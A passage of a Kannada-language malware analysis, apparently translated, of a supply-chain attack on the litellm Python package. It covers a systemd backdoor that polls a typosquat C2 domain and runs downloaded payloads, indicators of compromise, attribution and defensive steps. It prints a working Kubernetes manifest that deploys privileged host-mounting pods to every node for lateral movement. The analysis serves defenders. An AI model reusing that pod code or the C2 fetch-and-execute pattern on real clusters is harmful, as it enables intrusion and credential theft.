sysmon.service(ಸಿಸ್ಟಮ್ಡಿ ಬಳಕೆದಾರ ಘಟಕ, "ಸಿಸ್ಟಮ್ ಟೆಲಿಮೆಟ್ರಿ ಸೇವೆ" ಎಂದು ವಿವರಿಸಲಾಗಿದೆ) - ಬಿಹೇವಿಯರ್: ಆರಂಭಿಕ 300-ಸೆಕೆಂಡ್ ನಿದ್ರೆಯ ನಂತರ, ಸಮೀಕ್ಷೆಗಳು
https://checkmarx.zone/rawಪ್ರತಿ ~50 ನಿಮಿಷಗಳಿಗೆ - ಮರಣದಂಡನೆ: C2 ನಿಂದ ಹಿಂತಿರುಗಿಸಲಾದ URL ಅನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡುತ್ತದೆ
/tmp/pglog, ಅದನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವಂತೆ ಹೊಂದಿಸುತ್ತದೆ (chmod 755), ಅದನ್ನು ಪ್ರತ್ಯೇಕ ಅಧಿವೇಶನದಲ್ಲಿ ಚಲಾಯಿಸುತ್ತದೆ - ರಾಜ್ಯ ಟ್ರ್ಯಾಕಿಂಗ್:
/tmp/.pg_stateಅದೇ ಪೇಲೋಡ್ ಅನ್ನು ಮರು-ಡೌನ್ಲೋಡ್ ಮಾಡುವುದನ್ನು ತಡೆಯುತ್ತದೆ - ನಿರಂತರತೆ:
Restart=always,RestartSec=10— ಕ್ರ್ಯಾಶ್ಗಳಿಂದ ಬದುಕುಳಿದು ರೀಬೂಟ್ಗಳನ್ನು ಮಾಡುತ್ತದೆ
ಡೊಮೇನ್ checkmarx.zone ಇದು ಚೆಕ್ಮಾರ್ಕ್ಸ್ನ (ಭದ್ರತಾ ಕಂಪನಿ) ಟೈಪೊಸ್ಕ್ವಾಟ್ ಆಗಿದೆ checkmarx.com), ನೆಟ್ವರ್ಕ್ ಲಾಗ್ಗಳನ್ನು ಪರಿಶೀಲಿಸುವ SOC ವಿಶ್ಲೇಷಕರು ಕಾನೂನುಬದ್ಧ ಭದ್ರತಾ ಮಾರಾಟಗಾರನಂತೆ ಕಾಣುವವರಿಗೆ ಟ್ರಾಫಿಕ್ ಅನ್ನು ನೋಡುವಂತೆ ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ. ಇದು ಭದ್ರತಾ ಮಾರಾಟಗಾರರ ಬ್ರ್ಯಾಂಡಿಂಗ್ನ ಹಿಂದೆ ಅಡಗಿಕೊಳ್ಳುವ TeamPCP ಯ ವಿಶಾಲ ತಂತ್ರಕ್ಕೆ ಅನುಗುಣವಾಗಿರುವ ಉದ್ದೇಶಪೂರ್ವಕ ತಪ್ಪಿಸಿಕೊಳ್ಳುವ ತಂತ್ರವಾಗಿದೆ.
ಹಂತ 3b: ಕುಬರ್ನೆಟ್ಸ್ ಲ್ಯಾಟರಲ್ ಮೂವ್ಮೆಂಟ್
ಅಪಾಯಕ್ಕೀಡಾದ ವ್ಯವಸ್ಥೆಯು ಕುಬರ್ನೆಟ್ಸ್ ಸೇವಾ ಖಾತೆ ರುಜುವಾತುಗಳನ್ನು ಹೊಂದಿದ್ದರೆ, ಮಾಲ್ವೇರ್ ಎಲ್ಲಾ ಕ್ಲಸ್ಟರ್ ನೋಡ್ಗಳನ್ನು ಎಣಿಸುತ್ತದೆ ಮತ್ತು ನಿಯೋಜಿಸುತ್ತದೆ ವಿಶೇಷ ಪಾಡ್ಗಳು ಪ್ರತಿಯೊಬ್ಬರಿಗೂ:
pod_manifest = { 'apiVersion': 'v1', 'kind': 'Pod', 'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'}, 'spec': { 'nodeName': node_name, 'hostPID': True, 'hostNetwork': True, 'tolerations': [{'operator': 'Exists'}], 'containers': [{ 'name': 'setup', 'image': 'alpine:latest', 'command': ['sh', '-c', drop_cmd], 'securityContext': {'privileged': True}, 'volumeMounts': [{'name': 'host', 'mountPath': '/host'}] }], 'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}], 'restartPolicy': 'Never' } } ಪ್ರತಿಯೊಂದು ಪಾಡ್:
- ಹೀಗೆ ಓಡುತ್ತದೆ ಸವಲತ್ತು ಜೊತೆ
hostPID,hostNetwork, ಮತ್ತು ಪೂರ್ಣ ಹೋಸ್ಟ್ ಫೈಲ್ಸಿಸ್ಟಮ್ ಪ್ರವೇಶ - ಉಪಯೋಗಗಳು
chroot /hostಅದೇ ಸ್ಥಾಪಿಸಲುsysmon.pyಹೋಸ್ಟ್ನ ಮೂಲ ಫೈಲ್ಸಿಸ್ಟಮ್ನಲ್ಲಿ ಬ್ಯಾಕ್ಡೋರ್ - ಪಾಡ್ ಅಳಿಸುವಿಕೆಯ ನಂತರವೂ ನಿರಂತರತೆ ಉಳಿಯುವುದನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಲು, ಅದನ್ನು systemd ಸೇವೆಯಾಗಿ ನೋಂದಾಯಿಸುತ್ತದೆ.
- ಹೆಸರಿಸಲಾಗಿದೆ
node-setup-*ರಲ್ಲಿkube-systemನಾಮಸ್ಥಳವು ಕಾನೂನುಬದ್ಧ ಕ್ಲಸ್ಟರ್ ಮೂಲಸೌಕರ್ಯವಾಗಿ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತದೆ.
ಇದರರ್ಥ ಎ ಏಕ ರಾಜಿ ಮಾಡಿಕೊಂಡ CI/CD K8s ಪ್ರವೇಶ ಹೊಂದಿರುವ ರನ್ನರ್ ಕ್ಲಸ್ಟರ್ನಲ್ಲಿರುವ ಪ್ರತಿಯೊಂದು ನೋಡ್ ಅನ್ನು ಬ್ಯಾಕ್ಡೋರ್ ಆಗಿ ಪರಿವರ್ತಿಸಬಹುದು. — ಕುಬರ್ನೆಟ್ಸ್ನಲ್ಲಿ ಪ್ರಾಕ್ಸಿಯಾಗಿ ಲಿಟೆಲ್ಮ್ ಅನ್ನು ನಡೆಸುತ್ತಿರುವ ಸಂಸ್ಥೆಗಳಿಗೆ ದುರಂತದ ಪಾರ್ಶ್ವ ಚಲನೆಯ ಸನ್ನಿವೇಶ.
ಪೇಲೋಡ್ ಎವಲ್ಯೂಷನ್ (ಕಾಮೆಂಟ್ ಮಾಡಿದ ರೂಪಾಂತರಗಳು)
131-132 ಸಾಲುಗಳಲ್ಲಿನ ಮೂಲ ಕೋಡ್ ಎರಡು ಕಾಮೆಂಟ್ ಮಾಡಿದ ಹಿಂದಿನ ಪೇಲೋಡ್ ರೂಪಾಂತರಗಳನ್ನು ಒಳಗೊಂಡಿದೆ, ಇದು ದಾಳಿಕೋರನ ಅಭಿವೃದ್ಧಿ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಬಹಿರಂಗಪಡಿಸುತ್ತದೆ:
- ಎಲ್ಲಾ ಮೂರು ರೂಪಾಂತರಗಳು ಒಂದೇ ರೀತಿಯ ಹೊರಹರಿವಿನ ಮೂಲಸೌಕರ್ಯವನ್ನು ಹಂಚಿಕೊಳ್ಳಿ (
models.litellm.cloud), RSA-4096 ಸಾರ್ವಜನಿಕ ಕೀ, AES-256-CBC + RSA ಹೈಬ್ರಿಡ್ ಎನ್ಕ್ರಿಪ್ಶನ್ ಹೊದಿಕೆ, ಮತ್ತುtpcp.tar.gzಬಂಡಲ್ ಹೆಸರಿಸುವಿಕೆ - ಹಿಂದಿನ ರೂಪಾಂತರಗಳು ಸೇರಿಸಿದೆ RC4 ಗೂಢಲಿಪೀಕರಣ ಪದರ ಡೇಟಾ ಸಂಗ್ರಹ ಸ್ಕ್ರಿಪ್ಟ್ ಒಳಗೆ, ಕೊಯ್ಲು ಮಾಡಿದ ಡೇಟಾವನ್ನು ಹೊರಗಿನ AES+RSA ಹೊದಿಕೆಯ ಮೊದಲು ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡುವುದು. ಈ ಒಳಗಿನ RC4 ಪದರವನ್ನು ತೆಗೆದುಹಾಕುವ ಮೂಲಕ ಸಕ್ರಿಯ ಪೇಲೋಡ್ (ಸಾಲು 130) ಅನ್ನು ಸರಳೀಕರಿಸಲಾಗಿದೆ.
- ಹಿಂದಿನ ರೂಪಾಂತರಗಳು ಬಳಸುತ್ತವೆ
exec()ಜೊತೆStringIOಸಕ್ರಿಯ ಪೇಲೋಡ್ ಬಳಸುತ್ತಿರುವಾಗ, ಸಂಗ್ರಾಹಕವನ್ನು ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ಚಲಾಯಿಸಲು ಸೆರೆಹಿಡಿಯಿರಿsubprocess.run()stdout ಮರುನಿರ್ದೇಶನದೊಂದಿಗೆ — ಹೋಸ್ಟ್ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಮಾಲಿನ್ಯಗೊಳಿಸುವುದನ್ನು ತಪ್ಪಿಸುವ ಸ್ವಚ್ಛವಾದ ಬೇರ್ಪಡಿಕೆ - ಎಲ್ಲಾ ಮೂರು ರೂಪಾಂತರಗಳು ಒಂದೇ ರೀತಿಯ ರುಜುವಾತು ವಿಭಾಗಗಳು ಮತ್ತು ಸಂಗ್ರಹ ಮಾರ್ಗಗಳನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಂಡಿವೆ.
- ಹಿಂದಿನ ರೂಪಾಂತರಗಳಲ್ಲಿನ RC4 ಕೀಲಿಯು ಪ್ರಚೋದನಕಾರಿ ನಿಂದನೆಯಾಗಿತ್ತು, ಇದು ಟೆಲಿಗ್ರಾಮ್ನಲ್ಲಿ ನಟನ ಗಮನ ಸೆಳೆಯುವ ನಡವಳಿಕೆಗೆ ಅನುಗುಣವಾಗಿದೆ.
ಇದು ಕಾರ್ಯಾಚರಣೆಯ ಸಮಯದಲ್ಲಿ ಸಕ್ರಿಯ ಬೆಳವಣಿಗೆಯನ್ನು ಬಹಿರಂಗಪಡಿಸುತ್ತದೆ. ದಾಳಿಕೋರನು ಎನ್ಕ್ರಿಪ್ಶನ್ ಸ್ಟ್ಯಾಕ್ ಅನ್ನು ಸರಳೀಕರಿಸಿದನು ಮತ್ತು ಸಂಗ್ರಹಣಾ ಗುರಿಗಳು ಮತ್ತು ಹೊರಹರಿವಿನ ಮೂಲಸೌಕರ್ಯವನ್ನು ಸ್ಥಿರವಾಗಿರಿಸಿಕೊಂಡು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಪ್ರತ್ಯೇಕತೆಯನ್ನು ಸುಧಾರಿಸಿದನು.
ರಾಜಿ ಸೂಚಕಗಳು (IOCs)
ನೆಟ್ವರ್ಕ್
| ಸೂಚಕ | ಪ್ರಕಾರ | ಉದ್ದೇಶ |
|---|---|---|
models.litellm.cloud | ಡೊಮೇನ್ | ಹೊರತೆಗೆಯುವಿಕೆ ಅಂತ್ಯಬಿಂದು (HTTPS POST) |
checkmarx.zone | ಡೊಮೇನ್ | C2 ಪೋಲಿಂಗ್ ಎಂಡ್ಪಾಯಿಂಟ್ (HTTPS GET /raw) |
ಗಮನಿಸಿ: ಬಾಹ್ಯ ವರದಿ ಮಾಡುವ ಲಿಂಕ್ಗಳು checkmarx.zone/static/checkmarx-util-1.0.4.tgz TeamPCP ಅಭಿಯಾನದ ಹಿಂದಿನ KICS ಹಂತಕ್ಕೆ. ಇಲ್ಲಿ ವಿಶ್ಲೇಷಿಸಲಾದ litellm ಪೇಲೋಡ್ಗಳಲ್ಲಿ ಈ URL ಕಂಡುಬಂದಿಲ್ಲ.
ಪ್ಯಾಕೇಜ್ ಹ್ಯಾಶ್ಗಳು
| ಫೈಲ್ | SHA256 |
|---|---|
litellm-1.82.7.tar.gz | 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea |
litellm-1.82.8.tar.gz | d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5 |
ಫೈಲ್ ಸಿಸ್ಟಮ್
| ಸೂಚಕ | ಪ್ರಕಾರ | ಉದ್ದೇಶ |
|---|---|---|
~/.config/sysmon/sysmon.py | ಫೈಲ್ | ನಿರಂತರ ಹಿಂಬಾಗಿಲಿನ ಸ್ಕ್ರಿಪ್ಟ್ |
~/.config/systemd/user/sysmon.service | ಫೈಲ್ | ಸಿಸ್ಟಮ್ಡ್ ಪರ್ಸಿಸ್ಟೆನ್ಸ್ ಯೂನಿಟ್ |
/tmp/pglog | ಫೈಲ್ | ಎರಡನೇ ಹಂತದ ಬೈನರಿ ಡೌನ್ಲೋಡ್ ಮಾಡಲಾಗಿದೆ |
/tmp/.pg_state | ಫೈಲ್ | C2 ಸ್ಥಿತಿ ಟ್ರ್ಯಾಕಿಂಗ್ |
litellm_init.pth in site-packages/ | ಫೈಲ್ | ಪೈಥಾನ್ ಸ್ಟಾರ್ಟ್ಅಪ್ ಹುಕ್ (v1.82.8 ಮಾತ್ರ) |
tpcp.tar.gz | ಫೈಲ್ | ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಎಕ್ಸ್ಫಿಲ್ಟ್ರೇಶನ್ ಬಂಡಲ್ |
ಕುಬರ್ನೆಟ್ಸ್
| ಸೂಚಕ | ಪ್ರಕಾರ | ಉದ್ದೇಶ |
|---|---|---|
node-setup-* ಪಾಡ್ಗಳು ಒಳಗೆ kube-system | ಪಾಡ್ | ವಿಶೇಷ ಲ್ಯಾಟರಲ್ ಮೂವ್ಮೆಂಟ್ ಪಾಡ್ಗಳು |
sysmon.service ಕ್ಲಸ್ಟರ್ ನೋಡ್ಗಳಲ್ಲಿ | ಸೇವೆ | ಪಾಡ್ ಎಸ್ಕೇಪ್ ಮೂಲಕ ಹೋಸ್ಟ್-ಮಟ್ಟದ ನಿರಂತರತೆ |
ಕ್ರಿಪ್ಟೋಗ್ರಾಫಿಕ್
| ಸೂಚಕ | ವಿವರಗಳು |
|---|---|
| ದಾಳಿಕೋರ RSA-4096 ಸಾರ್ವಜನಿಕ ಕೀ | SHA256 ಫಿಂಗರ್ಪ್ರಿಂಟ್: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8. ಮೂರು ಪೇಲೋಡ್ ರೂಪಾಂತರಗಳಲ್ಲಿ ಎಂಬೆಡ್ ಮಾಡಲಾಗಿದೆ; ಇತರ TeamPCP ಕಾರ್ಯಾಚರಣೆಗಳಲ್ಲಿ ಅದೇ ಕೀಲಿಯನ್ನು ವರದಿ ಮಾಡಲಾಗಿದೆ. |
tpcp ಕಲಾಕೃತಿಗಳಲ್ಲಿ ಪೂರ್ವಪ್ರತ್ಯಯ | ಬಂಡಲ್ ಹೆಸರಿಸುವ ಸಂಪ್ರದಾಯ (tpcp.tar.gz) ಅಭಿಯಾನದಾದ್ಯಂತ ಸ್ಥಿರವಾಗಿದೆ |
ಗುಣಲಕ್ಷಣ: TeamPCP
ಈ ಅಭಿಯಾನದ ಹಿಂದಿನ ಬೆದರಿಕೆ ನಾಯಕನನ್ನು ಹೀಗೆ ಗುರುತಿಸಲಾಗಿದೆ ತಂಡ ಪಿಸಿಪಿ, ಇದನ್ನು PCPcat, Persy_PCP, ShellForce, ಮತ್ತು DeadCatx3 ಎಂದೂ ಕರೆಯುತ್ತಾರೆ.
ತಿಳಿದಿರುವ ಗುಣಲಕ್ಷಣಗಳು:
- ಟೆಲಿಗ್ರಾಮ್ ಚಾನೆಲ್ಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ
@Persy_PCPಮತ್ತು@teampcpಅಲ್ಲಿ ಅವರು ಭದ್ರತಾ ಕಂಪನಿಗಳನ್ನು ಕೆಣಕಿದರು - ಬಹು ಪರಿಸರ ವ್ಯವಸ್ಥೆಗಳಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ (GitHub ಕ್ರಿಯೆಗಳು, PyPI, npm, OpenVSX)
- ಅಭಿಯಾನದ ಪ್ರತಿಯೊಂದು ಹಂತಕ್ಕೂ ಮಾರಾಟಗಾರ-ನಿರ್ದಿಷ್ಟ ಟೈಪೋಸ್ಕ್ವಾಟ್ ಡೊಮೇನ್ಗಳನ್ನು ಬಳಸುತ್ತದೆ (ಉದಾ,
checkmarx.zoneಚೆಕ್ಮಾರ್ಕ್ಸ್ಗಾಗಿ,models.litellm.cloudಲಿಟೆಲ್ಮ್ಗಾಗಿ) - ಸ್ಥಿರವಾದ ಮೂಲಸೌಕರ್ಯ ಗುರುತುಗಳು: ಅದೇ RSA ಕೀ ಜೋಡಿ,
tpcp.tar.gzಹೆಸರಿಸುವ ಸಂಪ್ರದಾಯ,tpcp-docs-*ಡೆಡ್-ಡ್ರಾಪ್ ಸ್ಟೇಜಿಂಗ್ ಆಗಿ ಬಳಸಲಾಗುವ GitHub ರೆಪೊಸಿಟರಿಗಳು - ಕೆಳಮುಖ ಪೂರೈಕೆ ಸರಪಳಿಗಳಿಗೆ ಪ್ರವೇಶ ಬಿಂದುಗಳಾಗಿ ಭದ್ರತಾ ಸಾಧನಗಳನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಳ್ಳುತ್ತದೆ
ಗುಣಲಕ್ಷಣ ವಿಶ್ವಾಸ: ಹೆಚ್ಚು. ಹಂಚಿಕೆಯಾದ RSA ಸಾರ್ವಜನಿಕ ಕೀಲಿ, tpcp ಐದು ದಿನಗಳ ಅಭಿಯಾನದಾದ್ಯಂತ ಕಲಾಕೃತಿ ಹೆಸರಿಸುವಿಕೆ, C2 ಮೂಲಸೌಕರ್ಯ ಅತಿಕ್ರಮಣ ಮತ್ತು ಕಾರ್ಯಾಚರಣೆಯ ಗತಿಯು ಟ್ರಿವಿ, KICS, npm, OpenVSX ಮತ್ತು litellm ಹೊಂದಾಣಿಕೆಗಳನ್ನು ಒಂದೇ ನಟನಿಗೆ ಬಲವಾಗಿ ಜೋಡಿಸುತ್ತದೆ.
ಪ್ರೇರಣೆ: ಸಂಭಾವ್ಯ ಆರ್ಥಿಕ (ಕ್ರಿಪ್ಟೋ ವ್ಯಾಲೆಟ್ ಕಳ್ಳತನ, ಕ್ಲೌಡ್ ರುಜುವಾತು ಹಣಗಳಿಕೆ) ಕುಖ್ಯಾತಿಯೊಂದಿಗೆ (ಟೆಲಿಗ್ರಾಮ್ ನಿಂದನೆ) ಸಂಯೋಜಿತವಾಗಿದೆ. AWS IAM ನಿಂದ ಸೋಲಾನಾ ವ್ಯಾಲಿಡೇಟರ್ ಕೀಪೇರ್ಗಳವರೆಗೆ ವೈರ್ಗಾರ್ಡ್ ಕಾನ್ಫಿಗರೇಶನ್ಗಳವರೆಗೆ - ರುಜುವಾತು ಕೊಯ್ಲಿನ ವಿಸ್ತಾರವು - ಪ್ರತಿ ರಾಜಿಯಿಂದ ROI ಅನ್ನು ಗರಿಷ್ಠಗೊಳಿಸಲು ಬಯಸುವ ಆರ್ಥಿಕವಾಗಿ ಪ್ರೇರಿತ ನಟನನ್ನು ಸೂಚಿಸುತ್ತದೆ.
ಸಂಭಾವ್ಯ AI ನೆರವು: ಕ್ರೆಡೆನ್ಶಿಯಲ್ ಹಾರ್ವೆಸ್ಟರ್ ವ್ಯವಸ್ಥಿತವಾಗಿ ಸಮಗ್ರವಾಗಿದೆ - ಕಾರ್ಡಾನೊ ಸೈನಿಂಗ್ ಕೀಗಳು, ವೈರ್ಗಾರ್ಡ್ ಕಾನ್ಫಿಗರೇಶನ್ಗಳು ಮತ್ತು ಕನಿಕೊ ಡಾಕರ್ ರುಜುವಾತುಗಳಂತಹ ಸ್ಥಾಪಿತ ಗುರಿಗಳನ್ನು ಒಳಗೊಂಡಂತೆ 15+ ವಿಭಾಗಗಳು - AI-ನೆರವಿನ ಎಣಿಕೆಗೆ ಅನುಗುಣವಾಗಿರುತ್ತವೆ. ಪೇಲೋಡ್ ಪುನರಾವರ್ತನೆಯ ವೇಗ (ವಿಭಿನ್ನ ಎನ್ಕ್ರಿಪ್ಶನ್ ಯೋಜನೆಗಳೊಂದಿಗೆ ಮೂರು ರೂಪಾಂತರಗಳು), ಅಡ್ಡ-ಪರಿಸರ ವ್ಯವಸ್ಥೆಯ ಸಮನ್ವಯ (5 ದಿನಗಳಲ್ಲಿ 5 ಪರಿಸರ ವ್ಯವಸ್ಥೆಗಳು), ಮತ್ತು ಕಾರ್ಯಾಚರಣೆಯ OPSEC (ಮಾರಾಟಗಾರರ-ನಕಲು ಮಾಡುವ ಡೊಮೇನ್ಗಳು, ಹೈಬ್ರಿಡ್ ಎನ್ಕ್ರಿಪ್ಶನ್, ಟೆಲಿಮೆಟ್ರಿಯಂತೆ ವೇಷ ಧರಿಸಿದ ಸಿಸ್ಟಮ್ಡ್ ನಿರಂತರತೆ) AI-ನೆರವಿನ ಅಭಿವೃದ್ಧಿಯನ್ನು ಬಲ ಗುಣಕವಾಗಿ ಪ್ರತಿಬಿಂಬಿಸುವ ಥ್ರೋಪುಟ್ನ ಮಟ್ಟವನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಈ ಮೌಲ್ಯಮಾಪನವು ಊಹಾತ್ಮಕವಾಗಿದೆ; ನುರಿತ ನಿರ್ವಾಹಕರು AI ಪರಿಕರಗಳಿಲ್ಲದೆ ಇದೇ ರೀತಿಯ ವ್ಯಾಪ್ತಿಯನ್ನು ಸಾಧಿಸಬಹುದು.
ಹೊಸ ಟಿಟಿಪಿಗಳು ಮತ್ತು ತಂತ್ರಗಳು
1. ಭದ್ರತಾ ಉಪಕರಣ ಸರಬರಾಜು ಸರಪಳಿ ವಿಷಪೂರಿತ (T1195.002 ರೂಪಾಂತರ)
ಕೆಳಮುಖ ಗುರಿಗಳನ್ನು ತಲುಪಲು ಮೊದಲ-ಹಾಪ್ ಆಗಿ ಭದ್ರತಾ ಸ್ಕ್ಯಾನರ್ಗಳನ್ನು (ಟ್ರಿವಿ, ಕೆಐಸಿಎಸ್) ರಾಜಿ ಮಾಡಿಕೊಳ್ಳುವುದು ಹೊಸ ಉಲ್ಬಣವಾಗಿದೆ. ದಾಳಿಕೋರನು ಕೇವಲ ಗ್ರಂಥಾಲಯವನ್ನು ರಾಜಿ ಮಾಡಿಕೊಂಡಿಲ್ಲ - ಅವರು ಸಂಸ್ಥೆಗಳು ಬಳಸುವ ಸಾಧನಗಳನ್ನು ರಾಜಿ ಮಾಡಿಕೊಂಡರು ಪತ್ತೆ ಮಾಡಿ ರಾಜಿ ಮಾಡಿಕೊಂಡ ಗ್ರಂಥಾಲಯಗಳು. ಇದು ಒಂದು ಕುರುಡುತನವನ್ನು ಸೃಷ್ಟಿಸುತ್ತದೆ: ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಅನ್ನು ಹಿಡಿಯಬೇಕಾದ ಸ್ಕ್ಯಾನರ್ ಸ್ವತಃ ವಿತರಣಾ ಕಾರ್ಯವಿಧಾನವಾಗಿದೆ.
2. ಪೈಥಾನ್ .pth ಫೈಲ್ ಪರ್ಸಿಸ್ಟೆನ್ಸ್ (T1546)
ನಮ್ಮ litellm_init.pth v1.82.8 ನಲ್ಲಿನ ತಂತ್ರವು ವಿಶೇಷವಾಗಿ ಕಪಟವಾಗಿದೆ. ಪೈಥಾನ್ .pth ಫೈಲ್ಗಳು site-packages/ ಪ್ರತಿ ಇಂಟರ್ಪ್ರಿಟರ್ ಸ್ಟಾರ್ಟ್ಅಪ್ನಲ್ಲಿ ಸಂಸ್ಕರಿಸಲಾಗುತ್ತದೆ; ಯಾವುದೇ ಸಾಲಿನಿಂದ ಪ್ರಾರಂಭವಾಗುವ import ಪೇಲೋಡ್ ಅನ್ನು ಒಂದೇ ಒಂದಕ್ಕೆ ಜೋಡಿಸುವ ಮೂಲಕ ಕೋಡ್ ಆಗಿ ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗುತ್ತದೆ. import ಹೇಳಿಕೆಯ ಪ್ರಕಾರ, ದಾಳಿಕೋರನು ಪ್ರತಿಯೊಂದು ಪೈಥಾನ್ ಪ್ರಕ್ರಿಯೆಯಲ್ಲೂ ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತಾನೆ - litellm ಅನ್ನು ಆಮದು ಮಾಡಿಕೊಂಡಾಗ ಮಾತ್ರವಲ್ಲ. ಇದರರ್ಥ litellm ಅನ್ನು ಸ್ಥಾಪಿಸಿದರೂ ಎಂದಿಗೂ ಬಳಸದಿದ್ದರೂ ಸಹ ಪೇಲೋಡ್ ಉರಿಯುತ್ತದೆ ಮತ್ತು ಅದು ರಾಜಿ ಮಾಡಿಕೊಂಡ ದೋಷವನ್ನು ಬದಲಾಯಿಸುವ ಪರಿಹಾರವನ್ನು ಉಳಿದುಕೊಂಡಿರುತ್ತದೆ. .py ಪರಿಶೀಲಿಸದೆ ಫೈಲ್ಗಳು .pth ಕಡತಗಳನ್ನು.
3. ಪ್ರಿವಿಲೇಜ್ಡ್ ಪಾಡ್ ಡಿಪ್ಲಾಯಮೆಂಟ್ ಮೂಲಕ ಕುಬರ್ನೆಟ್ಸ್ ಕ್ಲಸ್ಟರ್-ವೈಡ್ ಲ್ಯಾಟರಲ್ ಮೂವ್ಮೆಂಟ್ (T1610, T1611)
ಪ್ರತಿಯೊಂದು ಕ್ಲಸ್ಟರ್ ನೋಡ್ನಲ್ಲಿ ವಿಶೇಷ ಪಾಡ್ಗಳ ಸ್ವಯಂಚಾಲಿತ ರಚನೆ — ಇದರೊಂದಿಗೆ hostPID, hostNetwork, ಹೋಸ್ಟ್ ಫೈಲ್ಸಿಸ್ಟಮ್ ಮೌಂಟ್, ಮತ್ತು chroot ಪರ್ಸಿಸ್ಟೆನ್ಸ್ ಅನ್ನು ಸ್ಥಾಪಿಸಲು — ಒಂದೇ ರಾಜಿ ಮಾಡಿದ ಕೆಲಸದ ಹೊರೆಯನ್ನು ಪೂರ್ಣ ಕ್ಲಸ್ಟರ್ ರಾಜಿಯಾಗಿ ಪರಿವರ್ತಿಸಲು ಎಸ್ಕೇಪ್ ಟು ಹೋಸ್ಟ್ (T1611) ನೊಂದಿಗೆ ಚೈನ್ಸ್ ಕಂಟೇನರ್ ನಿಯೋಜನೆ (T1610).
4. ಮಾರಾಟಗಾರ-ಸೋಗು ಹಾಕುವ C2 ಮೂಲಸೌಕರ್ಯ
ಬಳಸಿ models.litellm.cloud (ಲಿಟೆಲ್ಮ್ ಅನ್ನು ಅನುಕರಿಸುತ್ತದೆ) ಮತ್ತು checkmarx.zone (ಮಿಮಿಕ್ಸ್ ಚೆಕ್ಮಾರ್ಕ್ಸ್) C2/exfil ಎಂಡ್ಪಾಯಿಂಟ್ಗಳನ್ನು ನೆಟ್ವರ್ಕ್ ಮೇಲ್ವಿಚಾರಣೆಯನ್ನು ತಪ್ಪಿಸಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ. ನಿರ್ಗಮನ ದಟ್ಟಣೆಯನ್ನು ಪರಿಶೀಲಿಸುವ SOC ವಿಶ್ಲೇಷಕರು ಕಾನೂನುಬದ್ಧ ಮಾರಾಟಗಾರರ ಡೊಮೇನ್ಗಳಂತೆ ಕಾಣುವ HTTPS ಸಂಪರ್ಕಗಳನ್ನು ನೋಡುತ್ತಾರೆ.
5. ವಿಮಾನದೊಳಗೆ ತ್ವರಿತ ಪೇಲೋಡ್ ಪುನರಾವರ್ತನೆ
ಆಮದು-ಸಮಯದ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯೊಂದಿಗೆ v1.82.7 ಅನ್ನು ಪ್ರಕಟಿಸುವುದು, ನಂತರ 13 ನಿಮಿಷಗಳ ನಂತರ ಆರಂಭಿಕ-ಸಮಯದ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯೊಂದಿಗೆ v1.82.8 ಅನ್ನು ಪ್ರಕಟಿಸುವುದು, ಆಕ್ರಮಣಕಾರರು ನೈಜ ಸಮಯದಲ್ಲಿ ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುವುದು ಮತ್ತು ಹೊಂದಿಕೊಳ್ಳುವುದನ್ನು ತೋರಿಸುತ್ತದೆ. ಮೂಲ ಕೋಡ್ನಲ್ಲಿ ಸಂರಕ್ಷಿಸಲಾದ ಕಾಮೆಂಟ್-ಔಟ್ ಪೇಲೋಡ್ ರೂಪಾಂತರಗಳು (ವಿಭಿನ್ನ ಎನ್ಕ್ರಿಪ್ಶನ್ ಯೋಜನೆಗಳೊಂದಿಗೆ) ಕಾರ್ಯಾಚರಣೆಯ ಸಮಯದಲ್ಲಿ ಸಕ್ರಿಯ ಅಭಿವೃದ್ಧಿಯನ್ನು ದೃಢೀಕರಿಸುತ್ತವೆ.
ಏನು ಮಾಡಬಹುದು
ಈ ದಾಳಿಯು ಪ್ರತಿಯೊಂದು ಹಂತದಲ್ಲೂ ನಂಬಿಕೆಯನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತದೆ: ಭದ್ರತಾ ಪರಿಕರಗಳಲ್ಲಿನ ನಂಬಿಕೆ, ಪ್ಯಾಕೇಜ್ ನೋಂದಣಿಗಳಲ್ಲಿನ ನಂಬಿಕೆ, ಪರಿಚಿತವಾಗಿ ಕಾಣುವ ಡೊಮೇನ್ಗಳಲ್ಲಿನ ನಂಬಿಕೆ, ನಂಬಿಕೆ CI/CD ಯಾಂತ್ರೀಕೃತಗೊಂಡ. ಅದರ ವಿರುದ್ಧ ರಕ್ಷಿಸಲು ಈ ಪ್ರತಿಯೊಂದು ವಿಶ್ವಾಸಾರ್ಹ ಮಿತಿಗಳನ್ನು ಗಟ್ಟಿಗೊಳಿಸುವ ಅಗತ್ಯವಿದೆ:
ಪ್ಯಾಕೇಜ್ ಗ್ರಾಹಕರಿಗೆ
- ಕೇವಲ ಆವೃತ್ತಿಯಲ್ಲ, ಹ್ಯಾಶ್ ಮೂಲಕ ಅವಲಂಬನೆಗಳನ್ನು ಪಿನ್ ಮಾಡಿ.
